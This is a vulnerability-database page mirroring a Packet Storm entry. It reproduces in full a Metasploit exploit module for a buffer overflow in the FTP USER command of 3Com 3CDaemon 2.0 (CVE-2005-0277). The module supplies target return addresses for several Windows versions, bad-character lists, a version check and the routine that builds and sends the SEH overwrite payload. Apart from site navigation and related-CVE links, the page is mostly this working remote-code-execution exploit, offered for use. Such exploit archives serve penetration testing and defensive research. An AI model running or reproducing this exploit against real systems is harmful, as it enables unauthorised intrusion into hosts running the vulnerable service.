Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormH D MoorePACKETSTORM:83100
HistoryNov 26, 2009 - 12:00 a.m.

3Com 3CDaemon 2.0 FTP Username Overflow

2009-11-2600:00:00
H D Moore
packetstormsecurity.com
27

0.191 Low

EPSS

Percentile

95.7%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Ftp  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => '3Com 3CDaemon 2.0 FTP Username Overflow',  
'Description' => %q{  
This module exploits a vulnerability in the 3Com 3CDaemon  
FTP service. This package is being distributed from the 3Com  
web site and is recommended in numerous support documents.  
This module uses the USER command to trigger the overflow.  
  
},  
'Author' => [ 'hdm' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2005-0277'],  
[ 'OSVDB', '12810'],  
[ 'OSVDB', '12811'],  
[ 'BID', '12155'],  
[ 'URL', 'ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip'],  
  
],  
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 674,  
'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",  
'StackAdjustment' => -3500,  
'Compat' =>  
{  
'ConnectionType' => "-find"  
}  
  
},  
'Targets' =>   
[  
[   
'Windows 2000 English', # Tested OK - hdm 11/24/2005  
{  
'Platform' => 'win',  
'Ret' => 0x75022ac4, # ws2help.dll  
},  
],  
[  
'Windows XP English SP0/SP1',  
{  
'Platform' => 'win',  
'Ret' => 0x71aa32ad, # ws2help.dll  
},  
],  
[  
'Windows NT 4.0 SP4/SP5/SP6',  
{  
'Platform' => 'win',  
'Ret' => 0x77681799, # ws2help.dll  
},   
],  
[   
'Windows 2000 Pro SP4 French',   
{  
'Platform' => 'win',  
'Ret' => 0x775F29D0,  
},   
],  
  
],  
'DisclosureDate' => 'Jan 4 2005'))  
end  
  
def check  
connect  
disconnect   
if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/)  
return Exploit::CheckCode::Vulnerable  
end   
return Exploit::CheckCode::Safe  
end  
  
def exploit  
connect  
  
print_status("Trying target #{target.name}...")  
  
buf = rand_text_english(2048, payload_badchars)  
seh = generate_seh_payload(target.ret)   
buf[229, seh.length] = seh  
  
send_cmd( ['USER', buf] , false )  
  
handler  
disconnect  
end  
  
end  
`

Related

cvelist 1
cve 1
nessus 1
cvelist
cvelist
CVE-2005-0277
2005-02-10 05:00:00
cve
cve
CVE-2005-0277
2005-05-02 04:00:00
nessus
nessus
3Com 3CServer/3CDaemon FTP Server Multiple Vulnerabilities (OF, FS, PD, DoS)
2005-02-08 00:00:00

0.191 Low

EPSS

Percentile

95.7%

JSON
Related for PACKETSTORM:83100
cvelist1cve1nessus1